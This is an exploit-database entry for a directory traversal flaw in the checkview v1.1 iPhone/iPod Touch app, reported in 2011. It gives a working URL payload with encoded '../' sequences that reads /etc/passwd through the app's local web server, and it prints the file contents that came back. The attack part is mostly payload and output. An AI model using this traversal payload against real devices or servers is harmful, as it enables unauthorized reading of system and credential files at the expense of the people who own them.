checkview v1.1 for iPhone / iPod Touch Directory Traversal

🗓️ 15 Mar 2011 00:00:00Reported by [email protected]Type

zdt🔗 0day.today👁 16 Views

checkview v1.1 for iPhone / iPod Touch Directory Traversal, Exploit Testin

# Exploit Title: checkview(ÃƒÂ¥ÂºÃ¤) v1.1 for iPhone / iPod touch, Directory Traversal
# Date: 03/14/2011
# Author: [email protected]
# E-Mail : kimastory [at] gmail [dot] com
# Twitter : http://twitter.com/kimastory
# Software Link: http://itunes.apple.com/En/app/id381116321#
# Version: 1.1
# Tested on: iPhone, iPod 3GS with 4.2.1 firmware 
 
# There is directory traversal vulnerability in the checkview(ÃƒÂ¥ÂºÃ¤). 
# Exploit Testing
 
 
http://192.168.0.18:8888/..%2F..%2F..%2F..%2F..%2F/etc/passwd
 
 
#
# 4.3BSD-compatable User Database
#
# Note that this file is not consulted for login.
# It only exisits for compatability with 4.3BSD utilities.
#
# This file is automatically re-written by various system utilities.
# Do not edit this file.  Changes will be lost.
#
nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false
root:*:0:0:System Administrator:/var/root:/bin/sh
mobile:*:501:501:Mobile User:/var/mobile:/bin/sh
daemon:*:1:1:System Services:/var/root:/usr/bin/false
_wireless:*:25:25:Wireless Services:/var/wireless:/usr/bin/false
_securityd:*:64:64:securityd:/var/empty:/usr/bin/false
_mdnsresponder:*:65:65:mDNSResponder:/var/empty:/usr/bin/false
_sshd:*:75:75:sshd Privilege separation:/var/empty:/usr/bin/false
_unknown:*:99:99:Unknown User:/var/empty:/usr/bin/false



#  0day.today [2018-03-14]  #

15 Mar 2011 00:00Current

7.1High risk

Vulners AI Score7.1